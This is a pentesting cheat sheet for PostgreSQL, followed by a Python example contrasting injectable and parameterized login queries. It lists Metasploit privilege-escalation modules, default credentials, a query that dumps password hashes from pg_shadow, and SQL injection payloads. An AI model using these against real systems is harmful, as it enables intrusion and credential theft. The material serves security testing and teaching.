5432 - Pentesting postgres
PostgreSQL is an open-source relational database management system (RDBMS) that is widely used for managing and storing data. It is known for its reliability, stability, and robust feature set, and it is used by organizations of all sizes, from small startups to large enterprise businesses.
nmap
metasploit
metasploit - postgres 8.3.1 + udev_netlink
use exploit/linux/postgres/postgres_payload
|-> getuid => postgres
use exploit/linux/local/udev_netlink
|-> getuid => root
default users
| user | pass |
|---|---|
| postgres | postgres |
| postgres | password |
connect
local: psql -h $IP -U postgres -W
docker: psql -h $IP -U postgres -d <database>
remote: psql -h <host> -p <port> -U postgres -W -d <database>
commands
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # List users and their roles
# Get current user
SELECT user;
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+
# List databases
SELECT datname FROM pg_database;
# Read credentials (usernames + password hashes)
SELECT usename, passwd FROM pg_shadow;
# Get languages
SELECT lanname,lanacl FROM pg_language;
# Show extensions available on Amazon RDS (rds.extensions is an RDS-only setting)
SHOW rds.extensions;
# Get history of commands executed
\s
sql injection
basic
x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x
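The login bypass that the `x' or 1=1 -- x` payload above relies on, shown beside the parameterized query that defeats it. This is an added example, not part of the original page: it uses Python's built-in sqlite3 in-memory database as a stand-in for PostgreSQL so it runs offline, and the `users` table and its rows are constructed; with psycopg2 the hardened form is the same call with `%s` placeholders instead of `?`.

```python
import sqlite3


def make_db():
    # Constructed sample table standing in for the application's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "hunter2")])
    return db


def vulnerable_login(db, username, password):
    """Builds the statement by string concatenation: the attacker's quote
    closes the literal and '--' comments out the password check, so the
    query returns every user instead of only the one whose password matched."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return [row[0] for row in db.execute(sql).fetchall()]


def hardened_login(db, username, password):
    """Parameterized query: the driver passes the values separately from the
    SQL text, so quotes and comment markers are data, never SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password)).fetchall()]


if __name__ == "__main__":
    db = make_db()
    payload = "x' or 1=1 -- x"
    print(vulnerable_login(db, payload, "anything"))  # ['admin', 'alice']
    print(hardened_login(db, payload, "anything"))    # []
    print(hardened_login(db, "admin", "s3cret"))      # ['admin']
```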